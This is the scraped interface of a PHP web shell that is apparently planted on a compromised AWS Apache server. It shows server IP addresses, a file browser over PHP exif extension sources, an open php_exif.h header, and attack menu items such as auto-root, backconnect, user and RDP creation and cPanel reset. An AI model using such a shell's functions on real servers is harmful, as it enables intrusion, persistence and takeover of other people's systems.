Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.143.255.34
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
81 /
src /
ext /
exif /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
CREDITS
36
B
-rw-r--r--
Makefile
9.09
KB
-rw-r--r--
Makefile.fragments
0
B
-rw-r--r--
Makefile.objects
716
B
-rw-r--r--
config.h
1.67
KB
-rw-r--r--
config.h.in
1.57
KB
-rw-r--r--
config.log
18.41
KB
-rw-r--r--
config.m4
374
B
-rw-r--r--
config.nice
114
B
-rwxr-xr-x
config.status
20.74
KB
-rwxr-xr-x
config.w32
299
B
-rw-r--r--
configure
429.14
KB
-rwxr-xr-x
configure.ac
5.17
KB
-rw-r--r--
exif.c
156.59
KB
-rw-r--r--
exif.dep
5.02
KB
-rw-r--r--
exif.la
780
B
-rw-r--r--
exif.lo
299
B
-rw-r--r--
exif.stub.php
624
B
-rw-r--r--
exif_arginfo.h
1.48
KB
-rw-r--r--
libtool
206.17
KB
-rwxr-xr-x
php_exif.h
1.19
KB
-rw-r--r--
run-tests.php
137.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_exif.h
/* +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | https://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Rasmus Lerdorf <rasmus@php.net> | | Marcus Boerger <helly@php.net> | +----------------------------------------------------------------------+ */ #include "php_version.h" #define PHP_EXIF_VERSION PHP_VERSION extern zend_module_entry exif_module_entry; #define phpext_exif_ptr &exif_module_entry
Close